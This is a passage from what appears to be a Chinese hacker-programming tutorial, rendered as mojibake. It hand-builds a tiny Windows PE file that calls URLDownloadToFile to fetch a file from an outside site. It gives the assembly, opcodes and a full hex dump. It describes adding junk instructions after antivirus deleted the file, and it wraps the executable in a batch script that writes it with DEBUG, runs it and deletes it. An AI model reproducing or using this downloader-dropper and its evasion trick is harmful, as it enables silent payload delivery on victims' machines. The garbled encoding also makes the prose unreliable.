ÄÇÕâЩµØ·½¾ßÌåÌîдЩʲô¶«Î÷ÄØ?´óÖÂÀ´Ëµ·ÖΪÈý¸ö²¿·Ö:
1.µ¼Èë±í,°üÀ¨"URLDownloadToFile"Õâ¸öº¯ÊýµÄ×Ö·û´®ºÍ"URLMON.DLL"Õâ¸öDLLµÄ×Ö·û´®.
2.ÎļþµÄ¿ÉÖ´ÐлúÆ÷Âë.
3.º¯ÊýÐèÒªµÄÊý¾Ý.
Ê×ÏÈÊǵ¼Èë±í,¸ù¾ÝÉÏÒ»½Ú˵µÄÄÇЩ,ÎÒÃÇ¿ÉÒÔºÜÈÝÒ×µÄÅжϳöÕâ¸ö"URLDownloadToFile"¸ÃÌîÔÚ"58 11 00 00"µÄλÖÃ.µ±È»Äã¿ÉÒÔ¸ÄÕâ¸öÖµ,Õâ¸öÖµÖ»ÊÇÎÒдµÄ.×ÜÖ®ÄãÏë°ÉÕâ¸öµ¼Èë±í·ÅÔÚʲôλÖÃ,Õâ¸ö"58 11 00 00"¾ÍÒªÖ¸ÏòÕâ¸öλÖÃ.ÓÚÊÇÎÒÃÇÔÚPEÎļþµÄ00000158λÖÃдÈë"31 00 URLDownloadToFile"×Ö·û´®,Ç°ÃæÁ½¸ö16½øÖÆÊÇÐòºÅÊǸøתÔØÆ÷ÌṩÐÅÏ¢×÷ΪÔÚDLLÖе¼³öµØÖ·µÄÒÀ¾Ý.
(¶ÔÁË,ÕâÀï˵Ã÷Ò»¸öÎÊÌâ,ÕâƪÎĵµÒ²×¢ÊÍÁ˺ܶà"×¢Òâµã",ΪʲôÄØ,×Ðϸ¿´¿´ÕâЩעÒâµã,·¢ÏÖ¶¼ÊǺÍλÖÃÓйصÄ,ÄÇÊÇÒòΪ:PEÎļþÖеľø´ó¶àÊýµÄµØÖ·,¶¼ÊDzÉÓÃÎļþ¼ÓÔغóÄÚ´æÖеĵØÖ·µÄ,ÕâÑùÒ»·½Ãæ¼Ó¿ìÁ˼ÓÔØËÙ¶È,ÁíÍâÒ»·½ÃæҲʡÁ˲»ÉÙ¼ÓÔØÆ÷µÄ¹¤×÷,±ÈÈçÕâ¸ö"58 11 00 00"µÄµØÖ·,ÒòΪÎÒÃǼÓÔصÄλÖÃÊÇ1000H,ËùÒÔ¸ù¾ÝÕâ¸öλÖÃ,ÎÒÃÇÔÚÎļþÖеÄλÖþÍÊÇ158H,ÕâÀïÒªÉêÃ÷µÄÒ»µã,²¢²»ÊÇËùÓеĵØÖ·¶¼¿ÉÒÔÕâô¼ÆËãµÄ,ÒòΪÎÒÃÇÔÚPointerToRawDataÄÇÀïÉèÖÃÁË100H,ΪµÄ¾ÍÊÇÕâÑù·½±ãµÄ¼ÆËãÏà¶ÔµØÖ·,¶ÔÓÚÆäËûµÄPEÎļþ,Èç¹ûÒª¸ù¾ÝÕâÖÖÄÚ´æµØÖ·¼ÆËã³öPEÎļþµØÖ·,»¹²»ÊÇÕâô¼òµ¥ÊÇÊÂÇé,^_^..µ±È»,ÍøÂçÉÏÒ²ÓкܶàÕâÖÖת»»º¯Êý,RVAµ½OFFSETµÄ)
È»ºó°ÑURLMON.DLLÕâ¸ö×Ö·û´®ÌîÈë"6E 11 00 00"Ö¸ÏòµÄµØÖ·,µ±È»Õâ¸öÖµÒ²ÊÇ¿ÉÒÔ±äµÄ.
×îºó,ÎÒÃÇÒªÓñʼǼһÏÂ×îºóÕâ¸öº¯Êý±»µ¼³öµÄµØÖ·µÄ´æ·Å´¦,Ò²¾ÍÊÇ"20 11 00 00".
[×¢Òâ,ÒÔÉϵÄÕâЩ²Ù×÷¶¼ºÍIMAGE_IMPORT_DESCRIPTOR½á¹¹ºÍIMAGE_THUNK_DATA32½á¹¹Ïà¹Ø,¿´²»Ã÷°×µÄ¶à¿´¿´ÕâÁ½¸ö½á¹¹]
½ÓÏÂÀ´ÊÇ¿ÉÖ´ÐÐÂë.ÎÒÃǵÄÄ¿µÄºÜ¼òµ¥,Ö»ÒªÕâ¸öPEÎļþÄÜÏÂÔØÎļþ¾ÍÐÐ,ËùÒÔÎÒÃÇÖ»Òªµ÷ÓÃURLDownloadToFileº¯Êý¼´¿É,дһС¶Î»ã±àÂë(»¹¼ÇµÃÇ°Ãæ˵¹ýµÄURLDownloadToFileµÄµ÷Ó÷½·¨Âð,»¨Á˵ã±ÊÄ«µÄÄǸö):
´úÂë
PUSH 0 ;6A 00
PUSH 0 ;6A 00
PUSH XXXXXXXX ;68 XXXXXXXX
PUSH XXXXXXXX ;68 XXXXXXXX
PUSH 0 ;6A 00
CALL XXXXXXXX ;E8 XXXXXXXX
ÓÉÓÚº¯ÊýµÄµ÷ÓÃÊÇ·ûºÏPASCALµ÷ÓÃ,Ò²¾ÍÊÇSTDCALL,×ÔÓÒÏò×óѹջ,ËùÒÔÎÒÃǵIJÎÊýÒ²ÊÇ×îºóÒ»¸öÏÈÈëÕ».×îºóCALL³öÕâ¸öURLDownloadToFileº¯Êý.
Ç°Á½¸öXXXXXXXXµØÖ·ÊÇÁ½¸ö×Ö·û´®µÄµØÖ·,Ò²¾ÍÊÇURLDownloadToFileº¯ÊýµÄÁ½¸öÖØÒª²ÎÊý,×îºóÒ»¸öXXXXXXXXÊÇÕâ¸öº¯ÊýÔÚÄÚ´æÖеĵØÖ·(²Ù×÷ϵͳÒѾ°ïÎÒÃÇÌî³äÁË,»¹¼ÇµÃÉÏÃæ˵µÄÄǸöÓñʼǼµÄ"20 11 00 00"ô?)
Ö÷ÒªµÄ´úÂë¾ÍÊÇÕâô¶à,¿ÉÊDz»ÐÒµÄÊÂÇé·¢ÉúÁË,µ±ÎÒÓÃWINHEX°ÑÕâЩ´úÂëÌîÈëPE¿ò¼Ü²¢ÇÒ±£´æµÄʱºò,¾ÓÈ»±»É±¶¾Èí¼þɾ³ýÁË!!!!ËûÃÇ°ÑÕâ¸ö¿´×÷²¡¶¾????ÏëÀ´Ð´²¡¶¾ÔÀ´ÊÇÕâôÈÝÒ×µÄÊÂÇé(.....Ò»_Ò».)....
ÐÒºÃÓб¸·Ý(Èç¹ûûÓÐ,ÎÒ¿ÉÊÇÒª¿ÞËÀÁË.....),ÎÒÐÞ¸ÄÁËÕâЩ´úÂë,¼ÓÈëÁËһЩÀ¬»ø(±ÈÈçMOV EAX,1Ö®ÁеÄ)...×îÖյijÉÆ·´úÂëÊÇ:
´úÂë
B8 01000000 ;mov eax,1
6A 00 ;push 0
6A 00 ;push 0
68 D0114000 ;push D0114000 ;Ö¸ÏòÄã±£´æµÄ±¾µØ·¾¶×Ö·û´®µÄλÖÃ,±¾ÎÄÖÐÊÇ"c:\\gl123\\00204.jpg",×¢ÒâÊÇË«¸Ü.
68 A0114000 ;push A0114000 ;Ö¸ÏòÒªÏÂÔصÄURL×Ö·û´®±£´æµÄλÖÃ
6A 00 ;push 0
E8 02000000 ;call 02000000 ;Ò²¾ÍÊǺô½ÐÏÂÁ½¸ö×ֽڵĵØÖ·,ÕâÊÇ»úÆ÷Öе÷Óú¯ÊýµÄͨ³£×ö·¨
C9 ;leave
C3 ;ret
FF25 20114000 ;jmp 20114000 ;Õâ¸öÌøתµØÖ·¾ÍÊÇ"20 11 00 00",ÖÁÓÚÄǸö"40",
;¾ÍÊdzÌÐòµÄ½¨ÒéÆðʼ¼ÓÔصØÖ·"00400000".ÁíÍâ,ÕâÀïÊǷ»úÆ÷¸ñʽ.
00
00
00
00
½«ËûÃÇдÈëÄÄÀïÄØ?Õâ¸ö¾ÍËæ±ãÄãÁË,²»¹ýÇë··ÉÏÃæ˵µÄ,ÓиöµØÖ·ÊÇ(Ò²¾ÍÊÇ×¢Òâ1ËùÔÚµÄλÖÃ)AddressOfEntryPoint:Õâ¸ö¾ÍÊÇÓÃÀ´¶¨Î»Äã´úÂëµÄÖ´ÐÐÈë¿ÚµÄ,ÎÒÃǾͷÅÔÚµ¼Èë±íµÄºóÃæ,Ò²¾ÍÊÇ"00000179H"µÄλÖÃ.
×îºó¾ÍÊÇÄÇÁ½¸ö×Ö·û´®µÄµØÖ·ÁË,ÎÒÃÇÔÚ³ÌÐòÖÐÒѾ¸ø³ö
´úÂë
68 D0114000
68 A0114000
ÄÇÕâÁ½¸ö×Ö·û´®µÄλÖþÍÈ·¶¨ÁË,Ò»¸öÊÇ"000001D0H",ÎÒÃÇÒªÏÂÔصÄÎļþµØÖ·"/Article/UploadFiles/200408/20040818230017329.JPG"¾ÍÊDZ£´æµ½ÕâÀï..ÕâÀïÎÒÿ¸ö·ÖÅäÁË48×Ö½Ú´æ´¢ÇøÓò,´ó¼ÒÒ²¿ÉÒÔ¸ù¾Ý¾ßÌåÐèÒªÉèÖÃ.±ðÍüÁË»¹ÓÐdosÍ·²¿¿ÉÒÔ±£´æ56×ֽڵĿհ׿ÉÒÔдÊý¾Ý,Èç¹ûÐèÒªµÄ»°,ÐÞ¸ÄÖ¸Ïò¾ÍÊÇ.
¶ÔÓÚÉÏÃæµÄÕâÒ»¶Ñ·Ï»°,ÎÒµÄÄ¿µÄÊÇÏëÈôó¼ÒÃ÷°×,¶ø¹ÊÒâ½éÉܵĸñʽ,¼´ÊÇ˵,Èç¹ûÈÃÄã»»×öÆäËûµÄAPIº¯ÊýÒ²ÄÜÇáÒ׵ĵ÷ÓÃ,¶ø²»ÊǾÖÏÞÓÚURLDownloadToFile.^_^...±ÈÈçÄÇЩ...ÄÇЩ...¹¦ÄÜ°¡....(ÎÒ¿Éû˵°¡...ºÙºÙ)..
OK,Õâ¸öPEÎļþ×îºóµÄ³ÉÐÎPE¿ò¼ÜÊÇÕâÑùµÄ:
´úÂë
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00000000 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 MZ..............
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 ............@...
00000040 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 PE..L...........
00000050 00 00 00 00 70 00 0F 01 0B 01 00 00 00 02 00 00 ....p...........
00000060 00 00 00 00 00 00 00 00 79 01 00 00 00 00 00 00 ........y.......
00000070 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@.........
00000080 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................
00000090 00 30 00 00 00 02 00 00 00 00 00 00 02 00 00 00 .0..............
000000A0 00 01 00 00 00 00 00 00 00 01 00 00 00 10 00 00 ................
000000B0 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ................
000000C0 28 11 00 00 28 00 00 00 00 00 00 00 00 00 00 00 (...(...........
000000D0 00 02 00 00 00 10 00 00 00 02 00 00 00 01 00 00 ................
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 ............`..`
000000F0 00 00 00 00 00 00 00 00 02 00 00 00 00 20 00 00 ............. ..
00000100 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000110 00 00 00 00 60 00 00 60 00 00 00 00 00 00 00 00 ....`..`........
00000120 58 11 00 00 00 00 00 00 50 11 00 00 00 00 00 00 X.......P.......
00000130 00 00 00 00 6E 11 00 00 20 11 00 00 00 00 00 00 ....n... .......
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000150 58 11 00 00 00 00 00 00 31 00 55 52 4C 44 6F 77 X.......1.URLDow
00000160 6E 6C 6F 61 64 54 6F 46 69 6C 65 41 00 00 75 72 nloadToFileA..ur
00000170 6C 6D 6F 6E 2E 64 6C 6C 00 B8 01 00 00 00 6A 00 lmon.dll.?...j.
00000180 6A 00 68 D0 11 40 00 68 A0 11 40 00 6A 00 E8 02 j.h?@.h?@.j.?
00000190 00 00 00 C9 C3 FF 25 20 11 40 00 00 00 00 00 00 ...ÉÃÿ% .@......
000001A0 68 74 74 70 3A 2F 2F 77 77 77 2E 73 65 72 67 65 http://www.serge
000001B0 61 75 72 61 2E 6E 65 74 2F 54 47 50 2F 30 30 32 aura.net/TGP/002
000001C0 2F 69 6D 61 67 65 73 2F 30 34 2E 6A 70 67 00 00 /images/04.jpg..
000001D0 43 3A 5C 5C 47 4C 31 32 33 5C 5C 30 30 32 30 34 C:\\GL123\\00204
000001E0 2E 4A 50 47 00 00 00 00 00 00 00 00 00 00 00 00 .JPG............
000001F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
¼òµ¥µÄÔËÐÐÒ»ÏÂÕâ¸öPEÎļþ,ͼƬÒѾ±»ÏÂÔص½CÅ̵ÄGL123Îļþ¼Ð,˵Ã÷ÎÒÃǵŤ×÷»¹Êdzɹ¦µÄ¹þ.(ÍÛ,ºÃsexµÄMM°¡,¿ÚË®Á÷°¡Á÷.....)
Áù.°ü×°
µ½ÕâÀ↑ʼ,ÎÒÃǵÄEXEÊÇÓÐÁË,ÏÖÔÚ¿ªÊ¼DEBUG³ö³¡,ÎÒÃǵļƻ®ÊÇÓÃEÃüÁîдÈëÕû¸öPEÎļþÊý¾Ý,È»ºóÓÃWÃüÁî±£´æµ½ÁÙʱÎļþÖÐ,ÓÚÊǾͳɾÍÁËÕâ¸öÔʼBATÎļþ:
´úÂë
;echo off
;DEBUG<%~s0>nul2>nul
;GOTO BEGIN
E 100 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
......
......ÕâÀïÊ¡ÂÔÈô¸É
......
RCX
200
N E:\tmp\tmp99.TMP
W
Q
:BEGIN
rename E:\tmp\tmp99.TMP tmp99.EXE>nul2>nul
call E:\tmp\tmp99.EXE
del E:\tmp\tmp99.EXE>nul2>nul
²»¹ýÕâÑùºÜ²»ÃÀ¹Û...ÓÚÊÇÎÒÓÖÏëÁËÒ»¸ö°ì·¨ÓÅ»¯,ÓÃFÃüÁîÏòÌî³ä512¸ö00,È»ºóÔÙÔÚÏà¶ÔλÖÃдÈëÐèÒªµÄÊý¾Ý,ÓÚÊǺõ¾ÍÉú³ÉÁËÏÂÔØbat½Å±¾µÄbate1°æ±¾,Õâ¸öÊÇÍêÕûµÄÅú´¦íÎļþÁ?
ÉÏÒ»Ò³ 1 2 3 4 5 6 7 ÏÂÒ»Ò³ |
°²È«ÖйúÊ×Ò³ > ÎÄÕÂÖÐÐÄ > ºÚ¿Í±à³Ì